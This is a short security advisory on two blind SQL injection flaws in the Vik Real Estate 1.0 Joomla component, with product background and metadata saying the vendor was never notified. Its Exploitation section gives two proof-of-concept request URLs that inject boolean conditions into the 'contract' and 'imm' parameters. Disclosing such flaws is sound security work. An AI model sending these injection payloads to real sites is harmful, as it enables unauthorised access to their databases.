53 lines
No EOL
1.7 KiB
Text
53 lines
No EOL
1.7 KiB
Text
###################################################################
|
||
Vik Real Estate 1.0 Component Joomla Multiple Blind Sql Injection
|
||
###################################################################
|
||
|
||
Release Date Bug. 27-Oct-2011
|
||
Date Added. 30-Sep-2011
|
||
Vendor Notification Date. Never
|
||
Product. Vik Real Estate
|
||
Platform. Joomla
|
||
Affected versions. 1.0
|
||
Type. Commercial
|
||
Price. 69.00
|
||
Attack Vector. Blind Sql Injection
|
||
Solution Status. unpublished
|
||
CVE reference. Not yet assigned
|
||
Download http://www.extensionsforjoomla.com/vik-real-estate/joomla-extensions/vik-real-estate?vmcchk=1
|
||
|
||
I. BACKGROUND
|
||
|
||
Extension to manage real estates with details and description.
|
||
Main Functions:
|
||
- Manage Types of Contract (rental, selling, etc.)
|
||
- Condition of use (commercial, residential, etc.)
|
||
- Types of houses (apartment, villa, etc.)
|
||
- Manage Features (garden, garage, pool, etc. with icons)
|
||
- Manage States/Cities and Areas (New York City, Soho. Florence, Airport etc.)
|
||
Add real estates with description and images.
|
||
Search module included.
|
||
|
||
II. DESCRIPTION
|
||
|
||
Two vulnerabilities have been discovered in Vik Real Estate, joomla component,
|
||
the 2 vulnerabilities are blind injections (boolean-based time-based blind & blind)
|
||
|
||
The parameters affected are:
|
||
contract
|
||
imm
|
||
|
||
III. EXPLOITATION
|
||
|
||
|
||
parameter [contract]:
|
||
|
||
//index.php?option=com_vikrealestate&act=results&contract=1' AND 1=1 AND '666'='666&adibit=1&prov=1&area=_any&pricemin=_any&pricemax=_any&mqmin=0&mqmax=_any&type=_any&gores=Search
|
||
|
||
parameter [imm]:
|
||
|
||
//index.php?option=com_vikrealestate&act=show&imm=3' AND 1=1 AND '666'='666
|
||
|
||
|
||
|
||
Discovered by.
|
||
Chris Russell |